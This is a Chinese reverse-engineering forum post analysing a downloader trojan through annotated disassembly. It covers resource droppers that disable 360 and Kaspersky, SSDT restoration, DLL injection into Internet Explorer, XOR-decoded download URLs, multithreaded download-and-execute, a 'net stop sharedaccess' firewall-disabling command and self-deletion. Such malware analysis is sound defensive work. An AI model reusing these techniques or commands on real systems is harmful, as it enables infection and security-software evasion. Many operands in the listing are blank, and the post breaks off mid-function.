对某款驱动级下载者的分析

Hmily 发表于 2009-5-11 10:55

标题: 【原创】对某款驱动级下载者的分析
作者: jackozoo
时间: 2009-04-26,14:23
链接: http://bbs.pediy.com/showthread.php?t=87190

【文章标题】: 一款驱动级下载者的分析
【文章作者】: jackozoo
【下载地址】: 附件
【作者声明】: 只是感兴趣，没有其他目的。失误之处敬请诸位大侠赐教!

前几天在天网Mase上准备找点东西时, 无意间发现了这个小病毒, 于是就有了分析一下的想法.

具体情况: 程序FSG加壳, 有附加数据. 于是脱之, 附加数据追加之, 再使用FixResDemo将资源修复好,这时用任意一款资源查看工具都能清楚的看到其所有资源。
该下载者的自定义资源还真不少.如下:
资源列表:
1:对付360的弹窗的一个exe.
2:对付卡巴的一个exe,感觉是利用前段时间卡巴的那个CloseHandle句柄漏洞.
3:一个dll.用于注射到IE, 执行下载及运行下载文件的功能.
4:一个驱动文件, 唯一作用就是恢复SSDT.

从反汇编结果看来,这个小病毒是配出来的, 执行流程会有很多处判断, 对于远程地址, 有两种处理方式, 一种是直接作为exe文件的url下载并执行;
另一种方式是作为地址表下载下来,解析出N个地址,然后多线程下载运行.

好了,我不说废话了, 看下主要函数.

////主程序exe分析:

//从WinMain开始看起:
unpacked:00401A9A          push ebp
unpacked:00401A9B          mov ebp, esp
unpacked:00401A9D          sub esp, 704h
unpacked:00401AA3          push ebx
unpacked:00401AA4          push esi
unpacked:00401AA5          push edi
unpacked:00401AA6
unpacked:00401AA6 loc_401AA6:                ; DATA XREF: unpacked:0040A0DBo
unpacked:00401AA6          call Read_Overlay ; 读取附加数据, 一些配置信息. 目前一般的木马基本都是通过更新资源的方式
unpacked:00401AA6                            ; 来保存配置信息的.附加数据的不多了现在.
unpacked:00401AA6                            ;
unpacked:00401AA6                            ; 这个下载者会读取很多信息的,我们可以不去看它, 配置信息无非就是木马下
unpacked:00401AA6                            ; 载url啊, 还有一些bool变量啊, 什么的. 基本都能猜出来.部分配置信息会
unpacked:00401AA6                            ; 控制接下来木马的执行流程.我们把所有的执行都分析一遍就完了.
unpacked:00401AAB          test al, al
unpacked:00401AAD          jnz short loc_401AB9 //读取成功则跳走。
unpacked:00401AAF
unpacked:00401AAF loc_401AAF:                ; CODE XREF: WinMain(x,x,x,x)+26j
unpacked:00401AAF          push offset aReadInitFailed ; "Read Init Failed..."
unpacked:00401AB4          jmp loc_401CFA
unpacked:00401AB9 ; ---------------------------------------------------------------------------
unpacked:00401AB9
unpacked:00401AB9 loc_401AB9:                ; CODE XREF: WinMain(x,x,x,x)+13j
unpacked:00401AB9          call Read_Overlay ; 这里又读了一次自身, 完全是多余的，看来作者的编码很粗糙。
unpacked:00401ABE          test al, al
unpacked:00401AC0          jzshort loc_401AAF
unpacked:00401AC2          push 5
unpacked:00401AC4          mov esi, offset aCWindowsSm360_ ; "c:\\windows\\sm360.exe"//释放路径，奇怪作者为什么不将这个加密下。
unpacked:00401AC9          pop ecx
unpacked:00401ACA          lea edi,
unpacked:00401ACD          rep movsd
unpacked:00401ACF          push 5
unpacked:00401AD1          lea eax,
unpacked:00401AD4          movsb
unpacked:00401AD5          pop ecx
unpacked:00401AD6          mov esi, offset aCWindowsKavp_e ; "c:\\windows\\kavp.exe" //释放路径。
unpacked:00401ADB          lea edi,
unpacked:00401ADE          push eax       ; releasePath
unpacked:00401ADF          push offset resType ; "CL360"
unpacked:00401AE4          push 88h       ; resourceId
unpacked:00401AE9          rep movsd
unpacked:00401AEB          call ReleaseResource ;          //一个释放资源的函数。

unpacked:00401AF0          lea eax,
unpacked:00401AF3          push eax       ; releasePath
unpacked:00401AF4          push offset aKavp ; "KAVP"
unpacked:00401AF9          push 89h       ; resourceId
unpacked:00401AFE          call ReleaseResource ;

unpacked:00401B03          mov esi, WinExec
unpacked:00401B09          add esp, 18h
unpacked:00401B0C          xor ebx, ebx
unpacked:00401B0E          lea eax,
unpacked:00401B11          push ebx       ; uCmdShow
unpacked:00401B12          push eax       ; lpCmdLine
unpacked:00401B13          call esi ; WinExec ; 执行释放后的sm360.exe文件。（我后来分析了下这个，是关360弹窗的.）

unpacked:00401B15          lea eax,
unpacked:00401B18          push ebx       ; uCmdShow
unpacked:00401B19          push eax       ; lpCmdLine
unpacked:00401B1A          call esi ; WinExec ; 执行释放后的kavp.exe文件,卡巴.
unpacked:00401B1C          cmp byte_404A0B, bl ; jumptable 004096E0 case 1
unpacked:00401B22          jzshort loc_401B3B          //上面的byte_404A0B是从配置信息中读出来的，作为一个bool变量使用。
unpacked:00401B24          push ; hModule
unpacked:00401B27          call Start_ReSSDT ; 开始恢复SSDT.       //开始动刀了。

unpacked:00401B2C          test al, al
unpacked:00401B2E          pop ecx
unpacked:00401B2F          jnz short loc_401B3B
unpacked:00401B31          push offset aRestoreSsdtFai ; "Restore SSDT failed ." //作者用OutputDebugString输出了很多信息，极大地方便了我们的分析。
unpacked:00401B36          jmp loc_401CFA
unpacked:00401B3B ; ---------------------------------------------------------------------------
unpacked:00401B3B
unpacked:00401B3B loc_401B3B:                ; CODE XREF: WinMain(x,x,x,x)+88j    //这里是通过比较配置信息，即最上面那个bool变量来控制是否执行到这里。
unpacked:00401B3B                            ; WinMain(x,x,x,x)+95j    //最后我发现，上面的byte_404A0B其实是控制是否注射IE。为0则直接执行下载活动，为1则通过注射IE在IE进程中干坏事，因为一般防火墙不拦截IE。
unpacked:00401B3B          cmp byte_404A10, bl          //这里的byte_404A10也是一bool信息，控制下载模式是“直接exe地址”模式还是“地址表中转”模式。
unpacked:00401B41          jzloc_401CBF
unpacked:00401B47          lea eax,
unpacked:00401B4D          push 104h       ; nSize
unpacked:00401B52          push eax       ; lpFilename
unpacked:00401B53          push ebx       ; hModule
unpacked:00401B54          call GetModuleFileNameA ; 得到自身路径.
unpacked:00401B5A          test eax, eax
unpacked:00401B5C          jnz short loc_401B68
unpacked:00401B5E          push offset aGetmodulefilen ; "GetmoduleFileNameA failed.."
unpacked:00401B63          jmp loc_401CFA
unpacked:00401B68 ; ---------------------------------------------------------------------------
unpacked:00401B68
unpacked:00401B68 loc_401B68:                ; CODE XREF: WinMain(x,x,x,x)+C2j
unpacked:00401B68          lea eax,
unpacked:00401B6E          push offset aRb ; "rb"
unpacked:00401B73          push eax       ; Filename
unpacked:00401B74          call fopen    ; 打开自己, 读取附加数据.
unpacked:00401B7A          mov edi, eax
unpacked:00401B7C          pop ecx
unpacked:00401B7D          cmp edi, ebx
unpacked:00401B7F          pop ecx
unpacked:00401B80          jnz short loc_401B8C
unpacked:00401B82          push offset aCanNotOpenFile ; "can not open file , fopen..."
unpacked:00401B87          jmp loc_401CFA
unpacked:00401B8C ; ---------------------------------------------------------------------------
unpacked:00401B8C
unpacked:00401B8C loc_401B8C:                ; CODE XREF: WinMain(x,x,x,x)+E6j
unpacked:00401B8C          mov esi, fseek
unpacked:00401B92          push 2          ; Origin       //这个代表从文件末尾开始定位。
unpacked:00401B94          push 0FFFFFF30h ; Offset    //
unpacked:00401B99          push edi       ; File
unpacked:00401B9A          call esi ; fseek; 开始定位读取光标.

unpacked:00401B9C          push edi       ; File
unpacked:00401B9D          push 1          ; Count
unpacked:00401B9F          lea eax,
unpacked:00401BA5          push 6Ah       ; ElementSize
unpacked:00401BA7          push eax       ; DstBuf
unpacked:00401BA8          call fread       //将附加数据读到缓冲区中。

unpacked:00401BAE          push edi       ; File
unpacked:00401BAF          mov edi, fclose
unpacked:00401BB5          call edi ; fclose
unpacked:00401BB7          add esp, 20h
unpacked:00401BBA          lea eax,
unpacked:00401BC0          push 104h       ; uSize
unpacked:00401BC5          push eax       ; lpBuffer
unpacked:00401BC6          call GetWindowsDirectoryA    //得到系统目录，准备释放dll。

unpacked:00401BCC          lea eax,
unpacked:00401BD2          push offset aSystem32Ilovex ; "\\system32\\ilovexd.dll"
unpacked:00401BD7          push eax
unpacked:00401BD8          call _mbscat    ; 连接成一个路径 c:\Windows\system32\ilovexd.dll 作为释放路径.
unpacked:00401BDD          lea eax,
unpacked:00401BE3          push eax       ; releasePath
unpacked:00401BE4          push offset aMydll ; "MYDLL"
unpacked:00401BE9          push 85h       ; resourceId
unpacked:00401BEE          call ReleaseResource ; 释放一个dll.
unpacked:00401BF3          add esp, 14h
unpacked:00401BF6          test al, al
unpacked:00401BF8          jnz short loc_401C04
unpacked:00401BFA          push offset aReleaseDllFail ; "release dll failed ..."
unpacked:00401BFF          jmp loc_401CFA
unpacked:00401C04 ; ---------------------------------------------------------------------------
unpacked:00401C04
unpacked:00401C04 loc_401C04:                ; CODE XREF: WinMain(x,x,x,x)+15Ej
unpacked:00401C04          lea eax,
unpacked:00401C0A          push offset aRb_0 ; "rb+"
unpacked:00401C0F          push eax       ; Filename
unpacked:00401C10          call fopen       //打开刚才释放的dll。
unpacked:00401C16          push 2          ; Origin
unpacked:00401C18          push 0FFFFFF80h ; Offset
unpacked:00401C1A          push eax       ; File
unpacked:00401C1B          mov , eax
unpacked:00401C1E          call esi ; fseek
unpacked:00401C20          push ; File
unpacked:00401C23          lea eax,
unpacked:00401C29          push 1          ; Count
unpacked:00401C2B          push 6Ah       ; Size
unpacked:00401C2D          push eax       ; Str
unpacked:00401C2E          call fwrite       //将刚才读取的附加数据写到dll的末尾、达到传递配置信息的目的。
unpacked:00401C34          push ; File
unpacked:00401C37          call edi ; fclose
unpacked:00401C39          mov esi, offset Str1    //这里也是一个配置信息，用于配置注射的进程名。
unpacked:00401C3E          push esi
unpacked:00401C3F          call GetIdByProName ;       //调用从进程名得到进程ID的一个函数。
unpacked:00401C44          mov edi, _itoa
unpacked:00401C4A          lea ecx,
unpacked:00401C4D          push 0Ah       ; Radix
unpacked:00401C4F          push ecx       ; DstBuf
unpacked:00401C50          push eax       ; Val
unpacked:00401C51          mov , eax
unpacked:00401C54          call edi ; _itoa
unpacked:00401C56          add esp, 38h
unpacked:00401C59          cmp , ebx
unpacked:00401C5C          jnz short loc_401C98
unpacked:00401C5E          push offset File; "IEXPLORE.EXE"
unpacked:00401C63          push esi       ; Str1
unpacked:00401C64          call strcmp    ; 比较是否是"IEXPLORE.EXE"字符串
unpacked:00401C69          pop ecx
unpacked:00401C6A          test eax, eax ; 不相等就跳走.
unpacked:00401C6C          pop ecx
unpacked:00401C6D          jnz short loc_401C98
unpacked:00401C6F          push ebx       ; nShowCmd
unpacked:00401C70          push ebx       ; lpDirectory
unpacked:00401C71          push ebx       ; lpParameters
unpacked:00401C72          push offset File; "IEXPLORE.EXE"
unpacked:00401C77          push offset Operation ; "open"
unpacked:00401C7C          push ebx       ; hwnd
unpacked:00401C7D          call ShellExecuteA ; 这里创建一个IE进程.猜都可以猜到要注入进去.
unpacked:00401C83          push esi       ; 那这里就是"IEXPLORE.EXE"
unpacked:00401C84          call GetIdByProName ; 得到其进程ID
unpacked:00401C89          lea ecx,
unpacked:00401C8C          push 0Ah       ; Radix
unpacked:00401C8E          push ecx       ; DstBuf
unpacked:00401C8F          push eax       ; Val
unpacked:00401C90          mov , eax
unpacked:00401C93          call edi ; _itoa
unpacked:00401C95          add esp, 10h
unpacked:00401C98
unpacked:00401C98 loc_401C98:                ; CODE XREF: WinMain(x,x,x,x)+1C2j
unpacked:00401C98                            ; WinMain(x,x,x,x)+1D3j
unpacked:00401C98          push ; TargetProcessId
unpacked:00401C9B          lea eax,
unpacked:00401CA1          push eax       ; szDllPath
unpacked:00401CA2          call InjectDll ; 注如代码至IE进程.作者使用的是CreateRemoteThread这种最简单的方法.
unpacked:00401CA7          cmp byte_404A09, bl ; bool标志位, 决定是否自删除.
unpacked:00401CAD          pop ecx
unpacked:00401CAE          pop ecx
unpacked:00401CAF          jzloc_401ECD
unpacked:00401CB5          call DelSelf    ; 自删除掉, 从这看出注入IE进程的话, 下面的动作都不会执行的.
unpacked:00401CB5                            ; 如果不注入IE, 下面得才会执行.
unpacked:00401CB5                            ;
unpacked:00401CB5                            ; 在这个exe后, 我再单独分析一下那个dll.
unpacked:00401CBA          jmp loc_401ECD
unpacked:00401CBF ; ---------------------------------------------------------------------------
unpacked:00401CBF
unpacked:00401CBF loc_401CBF:                ; CODE XREF: WinMain(x,x,x,x)+A7j
unpacked:00401CBF          cmp byte_404A08, bl
unpacked:00401CC5          jzloc_401E7F
unpacked:00401CCB          mov edi, offset byte_4049A4
unpacked:00401CD0          push 63h
unpacked:00401CD2          push edi
unpacked:00401CD3          call DecodeURL ; 对URL异或解密
unpacked:00401CD8          pop ecx
unpacked:00401CD9          mov esi, offset aCProgra1Url_tx ; "C:\\Progra~1\\url.txt"
unpacked:00401CDE          pop ecx
unpacked:00401CDF          push ebx       ; LPBINDSTATUSCALLBACK
unpacked:00401CE0          push ebx       ; DWORD
unpacked:00401CE1          push esi       ; LPCSTR
unpacked:00401CE2          push edi       ; LPCSTR
unpacked:00401CE3          push ebx       ; LPUNKNOWN
unpacked:00401CE4          call URLDownloadToFileA ; 在这里下载的就不是exe,而是一个url表.里面估计都是地址.
unpacked:00401CE9          push esi       ; lpFileName
unpacked:00401CEA          call GetFileAttributesA ; 作者竟使用这个函数来判断文件是否存在.
unpacked:00401CF0          cmp eax, 0FFFFFFFFh
unpacked:00401CF3          jnz short loc_401D07
unpacked:00401CF5          push offset aDown_exeInvali ; "down.exe:invalid url or empty page, ple"...
unpacked:00401CFA
unpacked:00401CFA loc_401CFA:                ; CODE XREF: WinMain(x,x,x,x)+1Aj
unpacked:00401CFA                            ; WinMain(x,x,x,x)+9Cj
unpacked:00401CFA                            ; WinMain(x,x,x,x)+C9j
unpacked:00401CFA                            ; WinMain(x,x,x,x)+EDj
unpacked:00401CFA                            ; WinMain(x,x,x,x)+165j
unpacked:00401CFA          call OutputDebugStringA
unpacked:00401D00          xor eax, eax
unpacked:00401D02          jmp loc_401ED0
unpacked:00401D07 ; ---------------------------------------------------------------------------
unpacked:00401D07
unpacked:00401D07 loc_401D07:                ; CODE XREF: WinMain(x,x,x,x)+259j
unpacked:00401D07          push 18h
unpacked:00401D09          xor eax, eax
unpacked:00401D0B          pop ecx
unpacked:00401D0C          lea edi,
unpacked:00401D12          mov , bl
unpacked:00401D18          push offset aR ; "r+"
unpacked:00401D1D          rep stosd
unpacked:00401D1F          stosw
unpacked:00401D21          push esi       ; Filename
unpacked:00401D22          mov , ebx
unpacked:00401D25          mov , 3E8h
unpacked:00401D2C          stosb
unpacked:00401D2D          call fopen    ; 打开刚才的url.txt
unpacked:00401D33          pop ecx
unpacked:00401D34          cmp eax, ebx
unpacked:00401D36          pop ecx
unpacked:00401D37          mov , eax
unpacked:00401D3A          jzloc_401DE7
unpacked:00401D40          mov ecx, 0F9h
unpacked:00401D45          xor eax, eax
unpacked:00401D47          lea edi,
unpacked:00401D4D          mov , bl
unpacked:00401D53          rep stosd
unpacked:00401D55          push ; File
unpacked:00401D58          stosw
unpacked:00401D5A          stosb
unpacked:00401D5B          push 1          ; Count
unpacked:00401D5D          lea eax,
unpacked:00401D63          push 3E8h       ; ElementSize
unpacked:00401D68          push eax       ; DstBuf
unpacked:00401D69          call fread    ; 一次性把数据读完.
unpacked:00401D6F          add esp, 10h
unpacked:00401D72          mov , offset byte_404B98
unpacked:00401D79
unpacked:00401D79 loc_401D79:                ; CODE XREF: WinMain(x,x,x,x)+33Aj
unpacked:00401D79          mov edi,
unpacked:00401D7C          cmp , 0Ah
unpacked:00401D84          jnz short loc_401DCB
unpacked:00401D86          inc edi
unpacked:00401D87          lea eax,
unpacked:00401D8D          push edi
unpacked:00401D8E          push eax
unpacked:00401D8F          lea eax,
unpacked:00401D95          push eax
unpacked:00401D96          call lstrcpyn ; 显然.这个循环在将读出的数据分析后的url写到数组中.
unpacked:00401D9C          lea eax,
unpacked:00401DA2          push eax
unpacked:00401DA3          push
unpacked:00401DA6          call _mbscpy
unpacked:00401DAB          lea eax,
unpacked:00401DB1          push edi
unpacked:00401DB2          push eax
unpacked:00401DB3          call GetLeft    ; 得到一字符串的左边特定字节. 这个call我是在OD中跟出来的.
unpacked:00401DB8          oreax, 0FFFFFFFFh
unpacked:00401DBB          add esp, 10h
unpacked:00401DBE          sub eax,
unpacked:00401DC1          mov , ebx
unpacked:00401DC4          add , eax
unpacked:00401DC7          add , 64h
unpacked:00401DCB
unpacked:00401DCB loc_401DCB:                ; CODE XREF: WinMain(x,x,x,x)+2EAj
unpacked:00401DCB          inc
unpacked:00401DCE          mov eax,
unpacked:00401DD1          cmp eax,
unpacked:00401DD4          jlshort loc_401D79
unpacked:00401DD6          push ; File
unpacked:00401DD9          call fclose
unpacked:00401DDF          pop ecx
unpacked:00401DE0          push esi       ; lpFileName
unpacked:00401DE1          call DeleteFileA; 删除url.txt
unpacked:00401DE7
unpacked:00401DE7 loc_401DE7:                ; CODE XREF: WinMain(x,x,x,x)+2A0j
unpacked:00401DE7          push 13h
unpacked:00401DE9          xor eax, eax
unpacked:00401DEB          pop ecx
unpacked:00401DEC          lea edi,
unpacked:00401DF2          mov , ebx
unpacked:00401DF8          lea esi,
unpacked:00401DFE          rep stosd
unpacked:00401E00          mov edi, offset byte_404B98
unpacked:00401E05
unpacked:00401E05 loc_401E05:                ; CODE XREF: WinMain(x,x,x,x)+3ADj
unpacked:00401E05          push offset Str2; Str2
unpacked:00401E0A          push edi       ; Str1
unpacked:00401E0B          call strcmp    ; 这里又判断了一遍IE, 貌似又是多余的.
unpacked:00401E10          pop ecx
unpacked:00401E11          test eax, eax
unpacked:00401E13          pop ecx
unpacked:00401E14          jzshort loc_401E3B
unpacked:00401E16          push ebx       ; lpThreadId
unpacked:00401E17          push ebx       ; dwCreationFlags
unpacked:00401E18          push edi       ; lpParameter
unpacked:00401E19          push offset ThreadProc ; lpStartAddress
unpacked:00401E1E          push ebx       ; dwStackSize
unpacked:00401E1F          push ebx       ; lpThreadAttributes
unpacked:00401E20          call CreateThread ; 创建多个线程,加快速度, 其中从地址表中的每个url分别作为参数传到线程函数中.
unpacked:00401E26          push offset asc_4044C0 ; "----------"
unpacked:00401E2B          mov , eax
unpacked:00401E2D          call OutputDebugStringA
unpacked:00401E33          push 63h       ; dwMilliseconds
unpacked:00401E35          call Sleep    ; 估计是为了避免用户CPU突增, 休眠一段时间.
unpacked:00401E3B
unpacked:00401E3B loc_401E3B:                ; CODE XREF: WinMain(x,x,x,x)+37Aj
unpacked:00401E3B          add edi, 64h
unpacked:00401E3E          add esi, 4
unpacked:00401E41          cmp edi, offset dword_405368
unpacked:00401E47          jlshort loc_401E05
unpacked:00401E49          lea edi,
unpacked:00401E4F          mov , 14h
unpacked:00401E56
unpacked:00401E56 loc_401E56:                ; CODE XREF: WinMain(x,x,x,x)+3E3j
unpacked:00401E56          mov esi,
unpacked:00401E58          cmp esi, ebx
unpacked:00401E5A          jzshort loc_401E77
unpacked:00401E5C          push 0FFFFFFFFh ; dwMilliseconds
unpacked:00401E5E          push esi       ; hHandle
unpacked:00401E5F          call WaitForSingleObject ; 等各个线程执行完毕.
unpacked:00401E65          push esi       ; hObject
unpacked:00401E66          call __imp_CloseHandle ; 任务完成.
unpacked:00401E6C          push offset asc_4044B4 ; "==========="
unpacked:00401E71          call OutputDebugStringA
unpacked:00401E77
unpacked:00401E77 loc_401E77:                ; CODE XREF: WinMain(x,x,x,x)+3C0j
unpacked:00401E77          add edi, 4
unpacked:00401E7A          dec
unpacked:00401E7D          jnz short loc_401E56
unpacked:00401E7F
unpacked:00401E7F loc_401E7F:                ; CODE XREF: WinMain(x,x,x,x)+22Bj
unpacked:00401E7F          mov esi, OutputDebugStringA
unpacked:00401E85          push offset aWebgetOver_ ; "webget over ."
unpacked:00401E8A          call esi ; OutputDebugStringA
unpacked:00401E8C          cmp byte_404A0A, bl
unpacked:00401E92          jzshort loc_401EA0
unpacked:00401E94          push ebx       ; uCmdShow
unpacked:00401E95          push offset CmdLine ; "net stop sharedaccess"
unpacked:00401E9A          call WinExec    ; 关防火墙的命令.
unpacked:00401EA0
unpacked:00401EA0 loc_401EA0:                ; CODE XREF: WinMain(x,x,x,x)+3F8j
unpacked:00401EA0          push offset aStopSharedacce ; "stop sharedaccess over ."
unpacked:00401EA5          call esi ; OutputDebugStringA
unpacked:00401EA7          cmp byte_404A09, bl
unpacked:00401EAD          jzshort loc_401EB4
unpacked:00401EAF          call DelSelf    ; 自删除, 可以看到, 程序有很多分支, 主要是因为配置的不同导致不同的执行方式.
unpacked:00401EB4
unpacked:00401EB4 loc_401EB4:                ; CODE XREF: WinMain(x,x,x,x)+413j
unpacked:00401EB4          push offset aDelMeOver_ ; "Del me over ."
unpacked:00401EB9          call esi ; OutputDebugStringA
unpacked:00401EBB          push 1388h    ; dwMilliseconds
unpacked:00401EC0          call Sleep
unpacked:00401EC6          push offset aBeginReturn___ ; "begin return ..."
unpacked:00401ECB          call esi ; OutputDebugStringA
unpacked:00401ECD
unpacked:00401ECD loc_401ECD:                ; CODE XREF: WinMain(x,x,x,x)+215j
unpacked:00401ECD                            ; WinMain(x,x,x,x)+220j
unpacked:00401ECD          push 1
unpacked:00401ECF          pop eax
unpacked:00401ED0
unpacked:00401ED0 loc_401ED0:                ; CODE XREF: WinMain(x,x,x,x)+268j
unpacked:00401ED0          pop edi
unpacked:00401ED1          pop esi
unpacked:00401ED2          pop ebx
unpacked:00401ED3          leave
unpacked:00401ED4          retn 10h
unpacked:00401ED4 _WinMain@16 endp
unpacked:00401ED4
unpacked:00401ED7

//读取附加数据call (即配置信息了,主要为URl,和一些bool型的控制变量)
unpacked:00402114          push ebp
unpacked:00402115          mov ebp, esp
unpacked:00402117          sub esp, 170h
unpacked:0040211D          and , 0
unpacked:00402124          push ebx
unpacked:00402125          push esi
unpacked:00402126          push edi
unpacked:00402127          push 3Fh
unpacked:00402129          xor eax, eax
unpacked:0040212B          pop ecx
unpacked:0040212C          lea edi,
unpacked:00402132          rep stosd
unpacked:00402134          stosw
unpacked:00402136          lea eax,
unpacked:0040213C          push 0FFh       ; nSize
unpacked:00402141          push eax       ; lpFilename
unpacked:00402142          push 0          ; hModule
unpacked:00402144          call GetModuleFileNameA ; 得到自身文件路径.
unpacked:0040214A          test eax, eax
unpacked:0040214C          jashort loc_402158
unpacked:0040214E          push offset aGetModulefileN ; "Get modulefile name failed...."
unpacked:00402153          jmp loc_402384
unpacked:00402158 ; ---------------------------------------------------------------------------
unpacked:00402158
unpacked:00402158 loc_402158:                ; CODE XREF: Read_Overlay+38j
unpacked:00402158          lea eax,
unpacked:0040215E          push offset aRb ; "rb"
unpacked:00402163          push eax       ; Filename
unpacked:00402164          call fopen    ; 以二进制模式打开
unpacked:0040216A          mov ebx, eax
unpacked:0040216C          pop ecx
unpacked:0040216D          test ebx, ebx
unpacked:0040216F          pop ecx
unpacked:00402170          jnz short loc_40217C
unpacked:00402172          push offset aCanOpenMyself_ ; "can open myself...."
unpacked:00402177          jmp loc_402384
unpacked:0040217C ; ---------------------------------------------------------------------------
unpacked:0040217C
unpacked:0040217C loc_40217C:                ; CODE XREF: Read_Overlay+5Cj
unpacked:0040217C          and , 0
unpacked:00402180          mov esi, fseek
unpacked:00402186          push 1Bh
unpacked:00402188          xor eax, eax
unpacked:0040218A          pop ecx
unpacked:0040218B          lea edi,
unpacked:0040218E          push 2          ; Origin
unpacked:00402190          push 0FFFFFF30h ; Offset
unpacked:00402195          rep stosd
unpacked:00402197          push ebx       ; File
unpacked:00402198          call esi ; fseek; 定位至特定位置.
unpacked:0040219A          mov edi, fread
unpacked:004021A0          push ebx       ; File
unpacked:004021A1          push 1          ; Count
unpacked:004021A3          lea eax,
unpacked:004021A6          push 1          ; ElementSize
unpacked:004021A8          push eax       ; DstBuf
unpacked:004021A9          call edi ; fread; 下面全部都是一些配置信息的读取了, 就不做过多的解释，我们分析一下它主要干什么事就可以了。
unpacked:004021AB          add esp, 1Ch
unpacked:004021AE          test eax, eax
unpacked:004021B0          jnz short loc_4021BC
unpacked:004021B2          push offset aFopenCannTRead ; "fopen cann't read data.. /isinject "
unpacked:004021B7          jmp loc_402384
unpacked:004021BC ; ---------------------------------------------------------------------------
unpacked:004021BC
unpacked:004021BC loc_4021BC:                ; CODE XREF: Read_Overlay+9Cj
unpacked:004021BC          cmp , 59h
unpacked:004021C0          push 6Dh       ; Size
unpacked:004021C2          push 0          ; Val
unpacked:004021C4          setz al
unpacked:004021C7          mov byte_404A10, al
unpacked:004021CC          lea eax,
unpacked:004021CF          push eax       ; Dst
unpacked:004021D0          call memset
unpacked:004021D5          push 2          ; Origin
unpacked:004021D7          push 0FFFFFF31h ; Offset
unpacked:004021DC          push ebx       ; File
unpacked:004021DD          call esi ; fseek
unpacked:004021DF          push ebx       ; File
unpacked:004021E0          push 1          ; Count
unpacked:004021E2          lea eax,
unpacked:004021E5          push 1          ; ElementSize
unpacked:004021E7          push eax       ; DstBuf
unpacked:004021E8          call edi ; fread
unpacked:004021EA          add esp, 28h
unpacked:004021ED          cmp byte_404A10, 0
unpacked:004021F4          jzshort loc_402203
unpacked:004021F6          cmp , 49h
unpacked:004021FA          jnz short loc_40221A
unpacked:004021FC          and dword_404A0C, 0
unpacked:00402203
unpacked:00402203 loc_402203:                ; CODE XREF: Read_Overlay+E0j
unpacked:00402203                            ; Read_Overlay+116j
unpacked:00402203                            ; Read_Overlay+128j
unpacked:00402203          mov eax, dword_404A0C
unpacked:00402208          sub eax, 0
unpacked:0040220B          jzshort loc_40224F
unpacked:0040220D          dec eax
unpacked:0040220E          jzshort loc_402248
unpacked:00402210          dec eax
unpacked:00402211          jnz short loc_402260
unpacked:00402213          push offset aExplorer_exe ; "explorer.exe"
unpacked:00402218          jmp short loc_402254
unpacked:0040221A ; ---------------------------------------------------------------------------
unpacked:0040221A
unpacked:0040221A loc_40221A:                ; CODE XREF: Read_Overlay+E6j
unpacked:0040221A          cmp , 53h
unpacked:0040221E          jnz short loc_40222C
unpacked:00402220          mov dword_404A0C, 1
unpacked:0040222A          jmp short loc_402203
unpacked:0040222C ; ---------------------------------------------------------------------------
unpacked:0040222C
unpacked:0040222C loc_40222C:                ; CODE XREF: Read_Overlay+10Aj
unpacked:0040222C          cmp , 45h
unpacked:00402230          jnz short loc_40223E
unpacked:00402232          mov dword_404A0C, 2
unpacked:0040223C          jmp short loc_402203
unpacked:0040223E ; ---------------------------------------------------------------------------
unpacked:0040223E
unpacked:0040223E loc_40223E:                ; CODE XREF: Read_Overlay+11Cj
unpacked:0040223E          push offset aISEElse____ ; "I S E , else ...."
unpacked:00402243          jmp loc_402384
unpacked:00402248 ; ---------------------------------------------------------------------------
unpacked:00402248
unpacked:00402248 loc_402248:                ; CODE XREF: Read_Overlay+FAj
unpacked:00402248          push offset aSvchost_exe ; "svchost.exe"
unpacked:0040224D          jmp short loc_402254
unpacked:0040224F ; ---------------------------------------------------------------------------
unpacked:0040224F
unpacked:0040224F loc_40224F:                ; CODE XREF: Read_Overlay+F7j
unpacked:0040224F          push offset File; "IEXPLORE.EXE"
unpacked:00402254
unpacked:00402254 loc_402254:                ; CODE XREF: Read_Overlay+104j
unpacked:00402254                            ; Read_Overlay+139j
unpacked:00402254          push offset Str1
unpacked:00402259          call _mbscpy
unpacked:0040225E          pop ecx
unpacked:0040225F          pop ecx
unpacked:00402260
unpacked:00402260 loc_402260:                ; CODE XREF: Read_Overlay+FDj
unpacked:00402260          push 6Dh       ; Size
unpacked:00402262          lea eax,
unpacked:00402265          push 0          ; Val
unpacked:00402267          push eax       ; Dst
unpacked:00402268          call memset
unpacked:0040226D          push 2          ; Origin
unpacked:0040226F          push 0FFFFFF32h ; Offset
unpacked:00402274          push ebx       ; File
unpacked:00402275          call esi ; fseek
unpacked:00402277          push ebx       ; File
unpacked:00402278          push 1          ; Count
unpacked:0040227A          lea eax,
unpacked:0040227D          push 1          ; ElementSize
unpacked:0040227F          push eax       ; DstBuf
unpacked:00402280          call edi ; fread
unpacked:00402282          add esp, 28h
unpacked:00402285          test eax, eax
unpacked:00402287          jnz short loc_402293
unpacked:00402289          push offset aFopenCannTRe_0 ; "fopen cann't read data.. /isReSSDT "
unpacked:0040228E          jmp loc_402384
unpacked:00402293 ; ---------------------------------------------------------------------------
unpacked:00402293
unpacked:00402293 loc_402293:                ; CODE XREF: Read_Overlay+173j
unpacked:00402293          cmp , 59h
unpacked:00402297          push 6Dh       ; Size
unpacked:00402299          push 0          ; Val
unpacked:0040229B
unpacked:0040229B loc_40229B:                ; DATA XREF: sub_409563+17Dr
unpacked:0040229B          setz al       ; jump table for switch statement
unpacked:0040229E          mov byte_404A0B, al ; jumptable 004096E0 case 1
unpacked:004022A3          lea eax,
unpacked:004022A6          push eax       ; Dst
unpacked:004022A7          call memset
unpacked:004022AC          push 2          ; Origin
unpacked:004022AE          push 0FFFFFF33h ; Offset
unpacked:004022B3          push ebx       ; File
unpacked:004022B4          call esi ; fseek
unpacked:004022B6          push ebx       ; File
unpacked:004022B7          push 1          ; Count
unpacked:004022B9          lea eax,
unpacked:004022BC          push 1          ; ElementSize
unpacked:004022BE          push eax       ; DstBuf
unpacked:004022BF          call edi ; fread
unpacked:004022C1          add esp, 28h
unpacked:004022C4          test eax, eax
unpacked:004022C6          jnz short loc_4022D2
unpacked:004022C8          push offset aFopenCannTRe_1 ; "fopen cann't read data.. /isStopShare.."...
unpacked:004022CD          jmp loc_402384
unpacked:004022D2 ; ---------------------------------------------------------------------------
unpacked:004022D2
unpacked:004022D2 loc_4022D2:                ; CODE XREF: Read_Overlay+1B2j
unpacked:004022D2          cmp , 59h
unpacked:004022D6          push 6Dh       ; Size
unpacked:004022D8          push 0          ; Val
unpacked:004022DA          setz al
unpacked:004022DD          mov byte_404A0A, al
unpacked:004022E2          lea eax,
unpacked:004022E5          push eax       ; Dst
unpacked:004022E6          call memset
unpacked:004022EB          push 2          ; Origin
